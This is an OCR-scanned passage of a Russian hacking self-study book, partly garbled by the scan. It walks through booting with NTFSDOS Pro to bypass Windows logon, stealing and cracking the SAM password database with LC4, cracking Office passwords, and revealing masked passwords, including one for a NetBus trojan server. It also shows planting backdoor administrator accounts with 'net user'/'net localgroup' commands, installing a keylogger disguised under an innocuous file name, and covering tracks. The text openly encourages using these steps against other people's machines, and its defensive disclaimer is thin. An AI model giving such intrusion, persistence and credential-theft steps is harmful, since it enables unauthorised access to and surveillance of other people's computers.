NTFSDOS Pro uses the character set tor Hie United States version of MS-DOS (aide page 437) by default
Select any additional character sets you use with DOS.
Japan, code page 932
Korean (Johab). code page 1361
Korean, code page 949
MS-DOS Canadian-French, code page 863
MS-DOS Icelandic, code page 661
MS-DOS Multilingual (Latin 1). code page 650
MS-DOS Nordic, code page 865
MS-DOS Portuguese, code page 86
MS-DOS Slavic (Latin II). code page 852

< Back

Next >

Cancel

Рис. З.З. Диалог выбора языковой поддержки
> Выберите требуемый набор и щелкните мышью на кнопке Next (Далее).
На экране появится следующий диалог мастера установки NTFSDOS Pro
(Рис. 3.4).
В этом диалоге надо указать место хранения системных файлов Windows
NT/2000/XP, необходимых NTFSDOS Pro. Следует выбрать или корневой каталог системы, например, C:\WINNT, либо каталог \I386 инсталляционного диска
Windows NT/2000/XP, либо компакт-диск с Service Pack.
>• Сделайте свой выбор и щелкните мышью на кнопке Next (Далее). На экране
появится следующий диалог мастера установки NTFSDOS Pro (Рис. 3.5).
40

Проникновение в систему

Pro uses copies of several files located in your Windows NT/200Q/XP
m directory.
Specify the name of your Windows NT/2Q.OOVXP installation directory, or a directory containing the required
Windows NT/2000№ system files.
|c\ASFRool

Щелкните мышью на кнопке Finish (Завершить), чтобы завершить работу
мастера.
Теперь вы готовы работать с программой NTFSDOS Pro, что не вызывает особых
затруднений. Для этого следует установить в дисковод первую дискету NTFSDOS
Pro и перезагрузить компьютер с этой дискеты. После этого, не вынимая дискету из
дисковода, следует запустить исполняемый файл NTFSPRO.EXE, который смонтирует диски NTFS компьютера. Последующая работа с этими дисками, как и
со всем компьютером, выполняется с помощью команд MS-DOS так, как это
делается при использовании файловых систем FAT и FAT32, причем утилита
NTFSDOS Pro поддерживает длинные имена файлов и папок.
Загрузив систему MS-DOS и обеспечив поддержку NTFS, вы можете безо всяких
помех со стороны системы входной регистрации Windows 2000/XP делать с системой что угодно. Вы сможете копировать файлы, форматировать жесткий диск
(зачем — дело ваше), и выполнять другие, не менее увлекательные действия, которые едва ли понравятся хозяину компьютера. Однако, если вы — уважающий свое
время и труд хакер, вам, прежде всего, следует подумать о будущем и заняться делом. Например, полезно встроить в только что взломанную систему различные
инструменты для облегчения последующего доступа, что достигается установкой
трояна, который будет сообщать вам обо всех действиях пользователей. Также
очень неплохо скопировать на свой носитель информации разные файлы и папки
взломанной системы для последующего изучения — и не забудьте о базе SAM,
которая, напоминаем, находится в каталоге корень_системы/зуз1ет32/соп1’|д.

43

Самоучитель хакера

ы 5АМ
Чтобы взломать базу SAM, вначале следует получить доступ к файлу SAM.
Для этого можно прибегнуть к описанной выше утилите NTFSDOS Pro, загрузить систему MS-DOS компьютера и скопировать файл SAM из системной папки компьютера /KOpeHb_CMCTeMbi/system32/config на дискету. Далее этот
файл может быть использован для дешифрования какой-либо программой, например, LC4 — новейшей версией широко известной программы LOphtCrack
(http://www.atstake.com).
На Рис. 3.9 представлено окно приложения LC4 с открытым меню Import (Импорт).

«IB?!

Import | Senion

Help

Import From Local Machine
Import From Remote Registiy..
Import From SAM File…
Import From Sniffer…
Import From .LC File…
Import From .LCS (LC3) File
Import Frum PWDUMP File…

I Выберите команду меню File * New Session (Файл * Создать сеанс). Отобразится диалог, подобный Рис. 3.9.
> Выберите команду меню Import »Import From SAM File (Импорт * Импорт из
файла SAM). На экране появится сообщение о недоступности файла SAM.
>• Нажмите кнопку О К и загрузите в появившемся диалоге файл SAM, полученный при взломе компьютера А1ех-3.
>• В отобразившемся диалоге (Рис. 3.10) выберите команду Session » Begin Audit
(Сеанс » Запуск аудита) и запустите процедуру взлома паролей учетных записей.
44

Проникновение в систему
?l@stakeLC4 -(Unlilbdll
File

View

Import

Sestion

Help

.i» u
_u

lALEX-3

IALEX-З
(ALEX-З
lALEX-3
lALEX-3
lALEX-3
[ALEX-3

Administrator

• empty ‘

ASPNET
Guett
HelpAssittant
IUSH_ALEX-3

• empty ‘
• empty ‘
• empty ‘

IWAM_ALEX-3
NewUzer

• amply •
» empty ‘

* т т \ ft \ т
‘ empty ‘

e.;

Od Oh Qm us

i as
CS

mporled 7 accounts

Puc. 3.10. Ход процедуры взлома SAM отображается в панели справа
В зависимости от сложности пароля, время, необходимое для взлома SAM, может быть весьма велико. При благоприятном исходе отобразится диалог, показанный на Рис. 3.11, в котором представлены взломанные пароли SAM.

Adnuniitialoi
ASPNET
Gue»l
HelpAti.tlonl
IUSH.ALEX-3
IWAM.ALEX-3
NenUter

Рис. 3.11. Пароли базы SAM взломаны!
Все это очень интересно, поскольку теперь мы знаем пароль учетной записи администратора — 007 и, следовательно, можем делать с компьютером что угодно.
Время, потраченное на взлом пароля, составляет около 5 минут на компьютере
Pentium 2 с частотой процессора 400 МГц. Такая скорость обусловлена просто45

Самоучитель хакера
той пароля — всего три цифры, что позволило программе LC4 быстро перебрать
все комбинации цифр и символов.
Для настройки процедуры взлома в программе LC4 применяется диалог Auditing
Options For This Session (Параметры аудита для текущего сеанса), представленный на Рис. 3.12.
Dictionary Crack D

Enabled

Dictionary List [

The Dictionary Deck tests For passwords that are the same as the words listed in the
word file. This test is very fast and finds the weakest passwords.
Dictionary/Brute Hybrid Crack
El Enabled

|0

Characters to prepend

3

I П Characters to append

П Common letter substitutions (much slower)
The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in
the word file. It finds passwords such as «Dana99» or «monkeys!». This test is fast and
finds weak passwords.
Brute Force CrackCharacter Set

El Enabled
D

|A-ZandO-9

Distributed

Ptrtli.

Custom Claraclw Set Ш «ch ch«*:ttrt

J

I Oil

The Brute Force Crack tests fa passwords that are made up of the characters specified
in the Character Set. It finds passwords such as «WeR3pll6s» a «vC5«69t12b». This
lest is slow and finds medium to strong passwords. Specify a character set with more
characters to crack stronger passwords.

OK

Cancel

Puc. 3.12. Параметры настройки процедуры взлома паролей
Как видим, параметры работы LC4 разделены на три группы:
Dictionary Crack (Взлом по словарю), в которой содержится кнопка Dictionary
List (Список словарей), отображающая диалог для выбора словаря с тестируемым набором слов. Вместе с программой LC4 поставляется небольшой словарь
английских слов, однако в Интернете можно найти весьма обширные словари, позволяющие хакеру быстро перебрать практически все общераспространенные
слова английского языка. Отсюда понятно, почему не следует при выборе пароля
использовать осмысленные словосочетания, например, имена, названия городов,
предметов и т.д., поскольку все они элементарно взламываются словарной атакой.
Dictionary/Brute Hybrid Crack (Словарь/Комбинированный силовой взлом), где
можно указать число цифр, добавляемых после и/или перед словом, выбранным
из словаря, перед тестированием полученной строки. Так что если вы выберете
себе пароль типа Password???, его взлом неминуем.

46

Проникновение в систему
Brute Force Crack (Взлом грубой силой), где вы можете настроить взлом паролей прямым перебором всех комбинаций символов из указанного набора. Это
наиболее трудоемкий взлом паролей, и его успех зависит от сложности паролей
и мощности компьютера. В открывающемся списке Character Set (Набор символов) можно выбрать набор применяемых при взломе символов или, выбрав
пункт Custom (Пользовательский), ввести в ставшее доступным поле Custom
Character Set (List each character) (Пользовательский набор символов (перечислите каждый символ)) набор дополнительных символов. Установка флажка
Distributed (Распределенный) предоставляет возможность вычислять пароль
сразу на нескольких компьютерах. Для этого следует командой File » Save
Distributed (Файл » Сохранить распределенный) сохранить файл сеанса в виде
нескольких частей и исполнять их на нескольких компьютерах.
Программа LC4 представляет собой весьма мощный инструмент взлома защиты
Windows NT/2000/XP. Мы еще вернемся к ней при обсуждении средств сетевого
взлома компьютеров Windows, а сейчас познакомимся с популярной программой
взлома систем Windows 95/98, называемой Pwltool.

‘Рзлом доступа к файлам и лапкам
Число инструментов для взлома паролей доступа к информационным ресурсам Windows весьма значительно, поэтому здесь мы опишем только некоторые, завоевавшие определенную популярность в хакерских кругах. Мы обсудим пакет инструментов взлома документов MS Office компании Элкомсофт
(http://www.elcomsoft.com), который так и называется — OfficePassword 3.5.
После этого мы продвинемся чуть дальше и покажем, как можно выловить пароли доступа к различным ресурсам, скрытые за строкой звездочек «*******»
Эту задачу прекрасно решает завоевавшая широкую популярность утилита
Revelation от компании SnadBoy (http://www.snadboy.com).
Если у вас возникнет желание продвинуться в этом направлении и
познакомиться с другими инструментами, то мы советуем обратить внимание на такую утилиту взлома паролей архивных файлов,
как AZPR компании Элкомсофт, или к набору утилит Passware Kit,
предоставляемых на сайте http://www.lostpassword.com. Последние утилиты обеспечивают взлом самых разнообразных ресурсов
Windows — сообщений электронной почты, /СО, архивов, документов, кошельков Window — но уступают OfficePassword по гибкости
настройки процесса взлома.

47

Самоучитель хакера

Пакет OfficePassword 3.5
Пакет инструментов OfficePassword 3.5 выглядит весьма впечатляюще и состоит
из целого набора инструментов взлома доступа к документам Lotus Organizer,
MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicken, документам MS Office — Excel, Word, Access, Outlook, к архивам ZIP и даже к модулям
VBA, встроенным в документы MS Office.
Программы OfficePassword 3.5 снабжены
удобным графическим интерфейсом и
весьма эффективными средствами настройки процедур взлома. Давайте убедимся в этом на примере взлома доступа
к документу Word с очень заманчивым
названием password.doc, который должен содержать пароли — а иначе зачем его
так называть?
Итак, выполнив поиск по файловой системе Windows, вы натолкнулись на файл
password.doc, который при попытке открытия отображает диалог с предложением ввести пароль (Рис. 3.13).
Вводить пароли наугад — дело бесперспективное, так что мы устанавливаем пакет
программ OfficePassword 3.5 и выполняем
такие шаги:
>• Выберите команду меню Пуск • Программы • OfficePassword (Start •
Programs * OfficePassword). Отобразится диалог программ OfficePassword (см. Рис. 3.14).

Password

ИИ

Enter password to open file
С : \test\password . doc

1

II
[ OK

Cancel

Puc. 3.13. Диалог ввода пароля
доступа к документу Word
I OfficePassword «DEMO»
File

Took

Option*

Я1-Ш]

Help

Selecl document
You can also diag-and-drop files from Internet Explorer onto this
window.
>» (c) 1998-2001 Vitas Ramanchauskas. LastBit Software Щелкните на кнопке Select document (Выберите документ) и с помощью
отобразившегося стандартного диалога Windows выберите файл взламываемого документа MS Office.
Чтобы повторить описываемую здесь пошаговую процедуру, следует предварительно создать файл документа Word с парольной защитой. Как это сделать, можно прочитать в справке программы
MS Word или в любом из многочисленных руководств. Учтите, что
демо-версия программы OfficePassword позволяет взламывать пароли длиной не более 3-х символов.
48

Проникновение в систему
Далее последовательно отобразятся два диалога с предупреждениями об ограничении демо-версии программы только тремя символами пароля, а также о возможной длительности процесса взлома пароля.
>• Оба раза щелкните на кнопке О К, и на экране появится диалог Select recovery
mode (Выберите режим восстановления), представленный на Рис. 3.15.
Select lecoverv mode
Jocument path: C:\test\passwotddoc (Word)
Version
: Wotd 8.0+
ntemal version: 133
Word language : Russian (0419)
incryption type: Strong
Text size
: 537
Preview
© Automatic
OflicePassword automatically selects most suitable recovery options. Recovery may take a
lot of time (up to several months in case ol a long password]. About 80% of all passwords
could be recovered within 48 hours. Use guaranteed recovery otherwise.
О User-defined
Adjust settings to optimize search for specific case. (This option is for advanced useis only.)
О Guaranteed recovery
Success is guaranteed! Important: please read the documentation. Additional fee may apply.
I Click here to learn тогеП

Cancel

| Display help info

Next»

Puc. 3.15, Взламывать пароль можно несколькими методами
> В диалоге Select recovery mode (Выберите режим восстановления) можно
выбрать такие режимы взлома пароля:
• Automatic (Автоматический режим), который наиболее прост для применения,
поскольку требует только щелчка на кнопке Next (Далее), после чего запустится процедура, использующая наиболее широко используемые возможности
взлома пароля.
• User-defined (Пользовательский режим), позволяющий вручную настроить
процедуру поиска пароля. Этот режим рекомендуется только для подготовленных пользователей.
• Guaranteed recovery (Гарантированное восстановление), которое, по утверждению авторов, способно восстановить любой пароль, независимо
от его длины.
> После выбора режима взлома пароля щелкните на кнопке Next

lOlficePasswoid ‘DEMO*
Password found:
‘007’ (without quotes)
The password has been copied onto the clipboard
Would you like to open the document now?

L

Yes

No

Puc. 3.16. Пароль успешно взломан!
49

Самоучитель хакера
(Далее). На экране появится диалог, отображающий процесс взлома, после
чего на экране отобразится полученный результат (Рис. 3.16).
Остальные инструменты OfficePassword 3.5 работают аналогичным образом, позволяя эффективно решать задачу доступа к различным документам, защищенным
паролем. Единственная проблема — это время, требуемое для взлома. Если пароль
достаточно длинен и сложен, то его взлом может потребовать неимоверно больших ресурсов — а основной постулат криптографии гласит, что усилия на взлом
документа должны соответствовать его ценности.
Создатели программы рекомендуют начать восстановление с автоматического режима, и только в случае, когда после 24-28 часов
работы пароль не будет взломан, переходить к режиму гарантированного восстановления. Пользовательский режим восстановления обязательно следует применить, если пароль содержит
символы, не входящие в алфавит английского языка.
Поэтому перед тем, как запускать на всю катушку процедуру взлома, стоит попробовать еще одну возможность — выявления паролей, скрытых за строкой
звездочек.

Пароли зз строкой «******»
Все, кто когда-либо работал с приложениями, требующими ввода пароля для
доступа к определенным ресурсам, (например, при создании удаленного соединения с сервером Интернета), должно быть знают, что очень часто в строке ввода пароля отображается строчка звездочек типа «******». Иногда эти звездочки
просто закрывают отображение содержимого в поле, хотя сама информация, относящаяся к полю ввода, уже содержится в памяти компьютера. Это — недостаток программирования, поскольку имеются средства, позволяющие увидеть то,
что скрыто за строкой звездочек. Таким образом, вместо длительного взлома
паролей хакер получает их без всякого затруднения.
Хотя ценность таких инструментов ныне значительно уменьшилась, поскольку разработчики программ не сидят сложа руки и научились скрывать
пароли по-настоящему, все же с помощью программ определения паролей
за строкой звездочек можно достичь немалого успеха. Например, можно
получить такую интересную вещь, как пароль доступа к серверу трояна
NetBus для последующего использования. На Рис. 3.17 представлен пример
применения с этой целью известной утилиты Revelation от компании SnadВоу (http://www.snadboy.com) к строке пароля доступа к серверу NetBus в
диалоге настройки соединения клиента NetBus.

50

Проникновение в систему

ттт

•Л* SnadBoy’s Revelation
‘Circled V Cursor
Drag to reveal password

| Check For Update) |

About

Exit
I Copy to clipboard

Text ol Window Under ‘Circled V Cursor (il available)

007
Status
Revelation active.

Length of available text: 3

Reposition Revelation out of the way when dragging ‘circled V
When minimized, put in System Tray

i SWORD-2000
iMycq

Change Hoct

л^

«Host informationDestination: |SWORD-200
Host name/IP: 1.0-0-1
TCP-port:

П Always on top
Д Hide ‘How to’ instructions

How to
1) Left click and drag (while holding down the left mouse button) the ‘circled V

2) As you drag the ‘circled +’ cursor over different fields on various windows, the text in the field
under the cursor will be displayed in the Text of Window…’ box.
3) Release the left mouse button when you have revealed the text you desire.
NOTE — II the field contains text hidden by asterisks (or some other character), the actual text will be
shown. In some cases the text may actually be asterisks.
NOTE — Not an of the fields that the cursor passes over will have text that can be revealed. Check
the status light foi availability of text.
Bright green — text available (See length of text:’ in Status area)
Blight red — no text available

User name: |Administrator
Password:

Cancel

Puc. 3.17. Пароль доступа к серверу NetBus хоста Sword-2000
в нашем распоряжении!
Утилита Revelation действует следующим образом. Хакер перетаскивает мышью
изображение прицела из поля ‘Circled+’Cursor (‘Кружок+’Курсор) в диалоге
SnadBoy’s Revelation на строку для ввода пароля (этот прицел на Рис. 3.17 виден на поле Password (Пароль)). После этого в диалоге программы Revelation, в
строке Test of Window Under Circles and Cursor (if available) (Проверка поля
под «кружком и курсором» (если доступно)) отображается пароль (если он там
имеется). Как видно из Рис. 3.17, мы восстановили пароль 007 и теперь получили доступ к серверу NetBus хоста Sword-2000, который используется хозяином
взломанного компьютера в его целях (а мы будем использовать в своих целях).
Тем самым хакер избежал взлома доступа к средствам удаленного управления
(серверу NetBus) трудоемкими методами [11].

Создание потайных ходов
Посидев какое-то время за чужим компьютером, и кое-что успев, а кое-что и не
успев сделать, хакер должен уносить ноги, поскольку хозяин вот-вот вернется.
Однако перед уходом ему требуется сделать две вещи: устранить следы своего пребывания на компьютере и обеспечить себе возможность повторного проникновения.
51

Самоучитель хакера
Первая задача настолько важна, что мы отвели ей целую Главу 4. Сейчас же
сконцентрируемся на второй задаче — создании потайных ходов во взломанный
компьютер, позволяющих хакеру повторно навещать свою жертву, в том числе
удаленно, решая свои проблемы за чужой счет и без всяких хлопот. Причем, однажды добравшись до компьютера, хакер должен сделать так, чтобы даже в случае обнаружения одного из потайных ходов можно было немедленно создать
новый. На сленге такие ходы так и называют — «бэкдор», от английского слова
«backdoor» — черный ход, и для его создания можно прибегнуть к ухищрениям,
кратко описываемым в последующих разделах.

До£а&ле*ше учетных записей
Добавив перед выходом из компьютера учетную запись с высокими привилегиями, хакер сможет в дальнейшем входит в систему, в том числе удаленно и, при необходимости, создавать себе новые потайные ходы. Такая процедура делается
двумя командами MS-DOS: NET USER /ADD,
создающей новую учетную запись с указанным именем и паролем, и NET
LOCALGROUP /ADD, добавляющая созданную учетную запись в указанную локальную группу. На Рис. 3.18 представлен результат исполнения этих команд.
r^JCommand Prompt

— NewUser 00Г /add
|The command completed successfully.
C:\>net localgroup fldministrators NewUspr /add
I The command completed successfully.

Puc. 3.18. Создание потайного хода для пользователя
NewUser прошло успешно
Теперь новоиспеченный пользователь NewUser может без проблем входить в
компьютер, в том числе удаленно, и заниматься там своими делами без помех.
А если создать несколько таких учетных записей, то по мере их выявления хакер
может создавать все новых и новых пользователей, делая попытки защитить
компьютер практически невыполнимыми.

52

Проникновение в систему

Автозагрузка утилит
Однако создание собственной учетной записи — дело опасное, поскольку системный администратор имеет все возможности немедленно выявить свежеиспеченного пользователя компьютера. Тогда можно воспользоваться другой возможностью Windows — поместить в папку автозагрузки Startup внутри папки
Document and Settings (Документы и настройки) файлов программ, автоматически загружающихся при входе в систему пользователя. Причем программы из
папки Startup, находящейся в папке All users, будут запускаться для всех пользователей системы.
Хакер устанавливает в папку автозагрузки свою программу, которую он может
назвать совершенно безобидным именем, под которым она и будет скрытно исполняться. В число хакерских утилит могут входить троянские кони, клавиатурные шпионы (кейлоггеры), утилиты удаленного управления. В этой главе мы
опишем работу с очень популярным кейлоггером IKS (Invisible KeyLogger
Stealth — Невидимый клавиатурный шпион), демо-версию которого можно загрузить с сайта http://www.amecisco.com.

Клавиатурные шпионы
Клавиатурные шпионы — это программы, регистрирующие нажатия клавиш на
компьютере. Принцип их действия прост — все нажатия на клавиши перехватываются программой, и полученные данные записываются в отдельный файл, который далее может быть отослан по сети на компьютер взломщика.
Клавиатурный шпион IKS можно назвать весьма популярной программой — по
утверждению авторов на сайте http://www.amecisco.com, кейлоггер Invisible
KeyLogger 97 вошел под номером 8 в список 10 изделий, которые способны «напугать вас до смерти». Текущая версия кейлоггера функционирует на системах
Windows NT/2000/XP, внедряясь в ядро системы, что позволяет программе перехватывать все нажатия клавиш, включая 1Г^’ l+ir^n+l0″8″]. Поэтому IKS позволяет даже перехватывать нажатия клавиш при входной регистрации в системе
Windows NT/2000/XP. Таким образом, программа IKS действует подобно драйверу клавиатуры, перехватывая все нажатые клавиши и записывая их в журнальный файл.
Установка программы IKS не вызывает трудностей. После запуска загруженного с
Web-сайта файла iks2k20d.exe отображается диалог, представленный на Рис. 3.19.

53

Самоучитель хакера
D Standard Install | p Stealth Install | D Uninslall |

It’s recommended that you use Standard Install if this is your first time in using IKS. Just
accept the defaults and dick on «Install Now» button. Or you can dick on ‘Read readme M»
to get familiar with the concept of IKS first.
During a standard installation a program directory will be created; program files will be
placed in the directory. An icon to the log file viewer will be placed on the desktop. No Tile
renaming (stealth features) will take place.
Install Directory
|C \Progrem Files\iks
You need to heva administrator rights on this system for it to install successfully.

rf you want to uninstall in the future, just run this program (iksinstall.exe) again, dick on the
«Unmstall» tab, then «Uninstall Now» to automatically uninstall the standard installation.

Read readme.M

Рис. 3.19. Инсталляция кеилоггера IKS весьма проста
Щелчок на кнопке Install Now (Установить сейчас) устанавливает демо-версию
кейлоггера. Полная версия IKS допускает замену имен установочных файлов произвольными именами для сокрытия работы программы. Единственным файлом,
необходимым кейлоггеру IKS для работы, является файл iks.sys, который может
быть переименован с целью сокрытия его от пользователей. Все нажатые пользователем клавиши записываются в текстовый и двоичный файл, просматриваемый
с помощью программы dataview.exe, окно которой представлен на Рис. 3.20.
Settings • Help

0 Filter Out Arrow Keys
D Filter Out Ctrl and Alt Keys
П Rtter Out F1 to FT 2 Keys
О Filter Out All Other Function Keys

Ф Use Notepad
О Translate to Text Only
Gear La a
П Clear Binary Log Upon Exit
0 dear Text Log Upon Exit

Import Binary Log From:

Save Text Log To:
C:\DOCUME~1\ADMINI~1.000\LOCALS

I Browse,

Puc. 3.20. Диалог управления регистрацией клавиш
и хранением журнальных фатов

54

Проникновение в систему
Щелчок на кнопке Go! (Вперед) открывает файл журнала, хранящий все нажатые клавиши. С помощью диалога на Рис. 3.20 можно настроить работу кейлоггера так, что будут отфильтровываться все нажатые функциональные клавиши
на клавиатуре, а также очищаться содержимое журнала.
Как мы уже говорили, кейлоггер IKS функционирует как низкоуровневый драйвер, что скрывает его присутствие в системе. Однако файл iks.sys этого кейлоггера записывается в каталог KOpeHb_CHCTeMbi/system32/drivers, а в системном
реестре появляется регистрационная запись (эта запись выделена в диалоге редактора системного реестра Regedt32 на Рис. 3.21).
Registry Editor [HKEY LOCAL MACHINE on Locnl Mnchi
Registry Edit Tree View Security Options Window
SGemuwa
SGpc
&I37DRIVER
CEJIAS
Й ICQ Groupware £
COIISADMIN
IPMksl
CD ILDAP
•QIMAP4D32
•GDIMonitor
Й inetaccs
C±llnetln(o

яШип

Help

Start: REG_DWORD: 0x3
Type: REG_DWORD: 0x1

•Ш Inport

Puc. 3.21. В системном реестре Windows появилась предательская запись
С помощью таких записей в системном реестре все установленные в системе
кейлоггеры идентифицируются без всяких проблем (например, это с успехом
делает программа The Cleaner, особенно полезная для поиска троянских коней).
Чтобы преодолеть такой недостаток кейлоггера IKS, на вкладке Stealth Install
(Скрытая установка) инсталляционного диалога (Рис. 3.19) можно изменить имя
устанавливаемого драйвера на какое-нибудь безобидное, типа calc.sys, чтобы
запутать систему защиты (собственно, отсутствие этой возможности — основное
отличие демо-версии от полной).
Некоторым недостатком IKS является отсутствие поддержки средств передачи
накопленных данных по сети. Этого недостатка лишен кейлоггер 007 Stealth
Monitor, который умеет отслеживать посещения пользователем Web-сайтов, введенные пароли, запущенные программы, время обращения к файлам и другие
действия пользователя. Однако эта программа плохо маскирует свою работу — ее
процесс виден в диспетчере задач Windows, хотя хакер может заменить название
процесса каким-то другим, например, notepad.exe.

55

Самоучитель хакера

Заключение
Описанные в этой главе инструменты позволяют получить доступ к ресурсам
компьютера, защищенного паролем BIOS, экранными заставками и средствами
входной регистрации. Для их использования хакер должен работать непосредственно на консоли атакуемой системы, что несколько снижает ценность предложенных здесь технологий. В самом деле, опыт показывает, что при наличии физического доступа к компьютеру хакер просто похищает его жесткий диск для
последующей «работы». Тем не менее, все описанные здесь средства — это отнюдь не игрушки, и если система защиты компьютера плохо настроена, а политика безопасности организации, мягко говоря, слабовата (что весьма традиционно), то хакер, овладев описанными в главе методами, может достичь очень
и очень многого.
А для антихакера здесь наука — не будь ламером, защищай систему паролями
достаточной сложности, не бросай компьютер без всякой защиты на растерзание
типам вроде доктора Добрянского и иже с ним. Одна только установка шаблона
безопасности для рабочей станции Windows 2000/XP вполне способна пресечь
многие и многие штучки подобного рода персонажей. Что касается пользователей Windows 9x/Me, то их возможности по защите системы невелики — только
применение методов шифрования, наподобие предоставляемых пакетом PGP
Desktop Security, может защитить их компьютер от полного разгрома. Сама же
по себе система защиты Windows 9x/Me весьма слаба, как мы могли только что
убедиться.
Ну ладно, компьютер взломан, права доступа получены достаточные, информация выкачана, потайные ходы установлена — что же дальше? Пора замести следы
и вовремя смыться. Так что переходим к следующей главе.

56

Г Л А В А 4.

Сокрытие следов
Сокрытие следов — важнейший этап работы хакера, поскольку, выявив признаки
несанкционированной деятельности хакера, антихакер сразу же предпримет
меры защиты. Все это соответствует реальному миру, где преступники, приступая к «работе», надевают перчатки и маски, вешают фиктивные номера на автомобили, ну и так далее — все вы, наверное, хоть раз, да смотрели гангстерские
фильмы. Действуя в виртуальном мире, всякие разные «кул хацкеры», если они
хоть чего-то стоят, также должны предусмотреть, причем со всем тщанием, способы сокрытия следов своей деятельности.
Вообще говоря, тема сокрытия своей деятельности в виртуальном мире — весьма
актуальна и многогранна. В Главе 1 уже приводился тот печальный факт, что около 50% всех попыток удаленного взлома компьютерных систем выполняется с
домашних компьютеров, подключенных к серверам Интернета через телефонные
линии — причем серверы Интернета, все как один, снабжены устройствами АОН.
Стоит ли тут удивляться многочисленным сообщениям о поимке «страшного
преступника», который, запустив хакерскую программу автоподбора паролей
входной регистрации на сервере провайдера Интернета, считает себя полностью
неуязвимым. Причем такая уверенность основана на смехотворном, хотя и психологически понятном факторе,- ведь хакер сидит в своей квартире за закрытой дверью, где его «никто не видит», в то время как программа подбирает отмычки к входной двери чужого дома. Результаты такого «хакинга» иногда показывают в телевизионных новостях, под рубрикой «криминальная хроника»
(что и неудивительно).
Так что автор настоятельно предлагает всем любителям обсуждаемого жанра
самым внимательным образом почитать эту главу, прежде чем решиться на какие-либо действия (никак не поощряемые автором).
Автор в очередной раз предупреждает читателей об ответственности за все деяния в виртуальных просторах Интернета,
которые могут быть выполнены с помощью описанных в этой
книге программ и методов. Учтите, что книга написана с единственной целью — научить вас противостоять хакерским нападениям, что, безусловно, требует знания хакерских технологий.
За прямое применение описанных в книге технологий и их последствия автор ответственности не несет.

Самоучитель хакера

Дбз аспекта задачи сокрытия следов
Вообще говоря, каждый человек, работающий с компьютером, должен самым
внимательным образом отнестись к проблеме сохранения своей конфиденциальности. Дело в том, что вся хранящаяся в вашем компьютере, домашнем или рабочем, информация — это отражение вашей деятельности в виртуальном мире
Интернета. И раскрытие этой информации приводит к нарушению того, что англичане называют privacy — конфиденциальность личной жизни. Работая на компьютере, вы неизбежно оставляет за собой следы в виртуальном компьютерном
мире, следы, которые, если не предпринять особых мер, запросто позволяют
идентифицировать вашу личность в реальном, физическом пространстве, что не
всегда полезно и очень часто приводит к неприятностям.
Что касается обычных пользователей, то им автор рекомендует почитать книгу [10],
где красочно описаны случаи из жизни (правда, «за бугром») разного рода личностей, которые по разным причинам — беспечности, неопытности и тому подобным недостаткам — забыли о защите этой самой privacy. Такие люди, как
правило, пребывают в полной уверенности, что виртуальный мир Интернета,
или, как сейчас говорят, киберпространство — это нечто потустороннее, никак не
связанное с их жизнью в реальном мире. Но не о них сейчас речь.
Речь сейчас идет о том, как должен вести себя человек, который, путешествуя по
виртуальному компьютерному миру, любит перелезать через всякие там разные
шлагбаумы и заборы с табличкой «проход закрыт», и гулять по запретной территории киберпространства. Ясно, что при таких путешествиях следует придерживаться особых правил личной безопасности и конфиденциальности. Эта задача имеет два аспекта.
Во-первых, это локальная безопасность. Следует иметь в виду, что все эти
штучки в виртуальном компьютерном мире оставляют следы и в вашем компьютере, что может стать источником больших проблем. Вы сами подчас
можете увидеть на экранах телевизоров, как вслед за очередным, пойманным по
горячим следам, «кул хацкером» несут системный блок его компьютера — ясно,
что не на продажу.
Во-вторых, это глобальная безопасность. При прогулках в киберпространстве
хакеру следует оставлять как можно меньше следов хотя бы на закрытых для
постороннего входа территориях. Следует ясно понимать, что любые ваши действия в Интернете отслеживаются Web-серверами и фиксируются в журнальных
файлах как сервера провайдера Интернета, так и посещенных вами Webсерверов, и выявить по этим записям ваше местоположение в реальном мире сущие пустяки.
Так что есть смысл рассмотреть, где могут скрываться источники угроз для личностей, занимающихся всякими штучками и проделками в киберпространстве,

58

Сокрытие следов
затрагивающими интересы других людей (кстати, эти сведения не будут лишними и для всех прочих пользователей компьютеров).

Локальная безопасность
Итак, предположим, что вы с помощью своего верного друга-компьютера натворили делишек, за что и пострадали, и теперь ваш системный блок — в руках разного рода следопытов. Ну и что же они там могут такого увидеть, в этом вашем
системном блоке? Да почти все, что надо, чтобы сделать вашу участь просто прискорбной на ближайшие несколько лет. На винчестере компьютера можно найти:
• Наборы хакерских программ, которые вы использовали для своей деятельности.
• Историю путешествий в Интернете, рассказанную вашим Web-браузером.
• Вашу переписку по электронной почте, в том числе давным-давно удаленную
из почтовых ящиков.
• Различные файлы данных, которые вы извлекли из чужих компьютеров без
спроса у хозяев.
• Множество документов в корзине Windows, которые вы удалили программой
Проводник (Explorer) и решили, что все концы спрятаны в воду.
• Информацию о недавно открытых документах, хранимая в файле подкачки
Windows.
• Информацию в файле резервной копии системы, а также в файлах резервных
копий документов MS Office.
Так что ваш компьютер, по сути, преподносит всем, кому угодно на блюдечке с
голубой каемочкой всю информацию о вас и вашей деятельности. Откуда же
поступает эта информация? Давайте вначале рассмотрим каналы утечки конфиденциальной информации, предваряя обсуждение мер по их перекрытию.

Гибкие и жесткие диски
Одним из каналов утечки информации о вашей деятельности на компьютере являются гибкие и жесткие диски. Суть дела в том, что гибкие и жесткие диски
хранят гораздо больше данных, чем это можно увидеть в окне программы Проводник (Explorer) при их просмотре, о чем очень часто забывают владельцы дисков. Следует твердо помнить, что удаление файлов на диске командой Удалить
(Delete) проводника Windows ничего, фактически, не удаляет. Все такие файлы
попадают в корзину Windows и, кроме того, на дисках могут остаться их временные копии, создаваемые, например, приложениями MS Office. Чтобы увидеть это
воочию, включите режим отображения скрытых файлов, установив переключатель Показывать скрытые папки и файлы (Show hidden files and folders) в
59

Самоучитель хакера
диалоге Свойства папки (Folder Options) проводника Windows. Этот диалог открывается командой Сервис * Свойства папки (Tools * Folder Options) (Рис. 4.1).
)0бщие j Вид

(мА

| Типы файлов | Автономные файлы j

I

Можно отображать все папки е одинаковом виде.
| Как у текущей папки | | Сброс для всех папок

Ьпогните льные параметры:
И Отображать папку «Мои документы» но рабочем столе
Г;
D Отображать сжатые файлы и папки другим цветом
0 Помнить параметры отображения каждой папки
0 Скрывать защищенные системные файлы (рекомендуется)
Q Скрывать расширения для зарегистрированных типов файлов Г
Ш Скрытые файлы и палки
Q Ыпровление парами веб-страниц и попок
© Показывать и обрабатывать пару как единый файл
О Показывать обе части и обрабатывать их отдельно
О Показывать обе части, но обрабатывать их клк единый фай/ «
004.tmp
•|~WRL1120.tmp
~WRL19B2.tmp
|~WRL3531.tmp

|и| Мой компьютер

